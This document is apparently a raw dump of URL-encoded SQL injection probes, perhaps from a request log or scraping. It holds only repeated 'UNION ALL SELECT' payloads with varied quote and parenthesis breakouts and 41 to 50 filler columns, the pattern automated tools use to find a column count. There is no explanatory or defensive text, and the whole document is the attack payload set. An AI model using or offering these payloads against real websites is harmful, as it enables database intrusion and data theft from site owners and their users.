-5446%27%20UNION%20ALL%20SELECT%205561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%2C5561%23 -3637%27%20UNION%20ALL%20SELECT%207659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%23 -3726%27%20UNION%20ALL%20SELECT%206156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%2C6156%23 -7915%27%20UNION%20ALL%20SELECT%201801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%2C1801%23 -4018%27%20UNION%20ALL%20SELECT%203527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%2C3527%23 -1290%27%20UNION%20ALL%20SELECT%203032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%2C3032%23 -5749%27%20UNION%20ALL%20SELECT%202903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%2C2903%23 -9194%27%20UNION%20ALL%20SELECT%206577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%2C6577%23 -3469%27%20UNION%20ALL%20SELECT%209198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%2C9198%23 -9851%27%20UNION%20ALL%20SELECT%203537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%23 -3150%27%29%20UNION%20ALL%20SELECT%208989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%23 -6746%27%29%20UNION%20ALL%20SELECT%206278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%2C6278%23 -5493%27%29%20UNION%20ALL%20SELECT%206291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%2C6291%23 -6728%27%29%20UNION%20ALL%20SELECT%208548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%2C8548%23 -8264%27%29%20UNION%20ALL%20SELECT%201503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%2C1503%23 -3241%27%29%20UNION%20ALL%20SELECT%208066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%2C8066%23 -3035%27%29%20UNION%20ALL%20SELECT%209981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%2C9981%23 -8192%27%29%20UNION%20ALL%20SELECT%206930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%2C6930%23 -4407%27%29%20UNION%20ALL%20SELECT%205012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%2C5012%23 -2839%27%29%20UNION%20ALL%20SELECT%207760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%2C7760%23 -2825%27%29%29%20UNION%20ALL%20SELECT%207963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%2C7963%23 -6813%27%29%29%20UNION%20ALL%20SELECT%207796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%2C7796%23 -4241%27%29%29%20UNION%20ALL%20SELECT%207537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%2C7537%23 -9637%27%29%29%20UNION%20ALL%20SELECT%203800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%2C3800%23 -2991%27%29%29%20UNION%20ALL%20SELECT%204957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%2C4957%23 -3379%27%29%29%20UNION%20ALL%20SELECT%201354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%2C1354%23 -7857%27%29%29%20UNION%20ALL%20SELECT%209701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%23 -7177%27%29%29%20UNION%20ALL%20SELECT%202569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%2C2569%23 -6001%27%29%29%20UNION%20ALL%20SELECT%204141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%2C4141%23 -8917%27%29%29%20UNION%20ALL%20SELECT%203168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%2C3168%23 -6710%27%29%29%29%20UNION%20ALL%20SELECT%201631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%2C1631%23 -9866%27%29%29%29%20UNION%20ALL%20SELECT%201061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%2C1061%23 -7366%27%29%29%29%20UNION%20ALL%20SELECT%209171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%2C9171%23 -7989%27%29%29%29%20UNION%20ALL%20SELECT%205137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%23 -3127%27%29%29%29%20UNION%20ALL%20SELECT%202419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%2C2419%23 -3583%27%29%29%29%20UNION%20ALL%20SELECT%203446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%2C3446%23 -7913%27%29%29%29%20UNION%20ALL%20SELECT%203031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%2C3031%23 -8965%27%29%29%29%20UNION%20ALL%20SELECT%207924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%2C7924%23 -5016%27%29%29%29%20UNION%20ALL%20SELECT%206012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%2C6012%23 -2899%27%29%29%29%20UNION%20ALL%20SELECT%207659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%2C7659%23 -4387%27%20UNION%20ALL%20SELECT%209562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%2C9562%23 -7279%27%20UNION%20ALL%20SELECT%208777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%2C8777%23 -7546%27%20UNION%20ALL%20SELECT%204817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%2C4817%23 -8803%27%20UNION%20ALL%20SELECT%206187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%23 -6572%27%20UNION%20ALL%20SELECT%201393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%2C1393%23 -5845%27%20UNION%20ALL%20SELECT%201352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%2C1352%23 -8882%27%20UNION%20ALL%20SELECT%203264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%2C3264%23 -4647%27%20UNION%20ALL%20SELECT%203109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%2C3109%23 -7821%27%20UNION%20ALL%20SELECT%205917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%2C5917%23 -2155%27%20UNION%20ALL%20SELECT%205961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%2C5961%23 -5630%22%29%20UNION%20ALL%20SELECT%204526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%2C4526%23 -1725%22%29%20UNION%20ALL%20SELECT%203993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%2C3993%23 -5230%22%29%20UNION%20ALL%20SELECT%207664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%2C7664%23 -6128%22%29%20UNION%20ALL%20SELECT%206150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%2C6150%23 -1204%22%29%20UNION%20ALL%20SELECT%204340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%2C4340%23 -6956%22%29%20UNION%20ALL%20SELECT%207479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%2C7479%23 -4547%22%29%20UNION%20ALL%20SELECT%203187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%2C3187%23 -1840%22%29%20UNION%20ALL%20SELECT%203651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%2C3651%23 -3779%22%29%20UNION%20ALL%20SELECT%204769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%2C4769%23 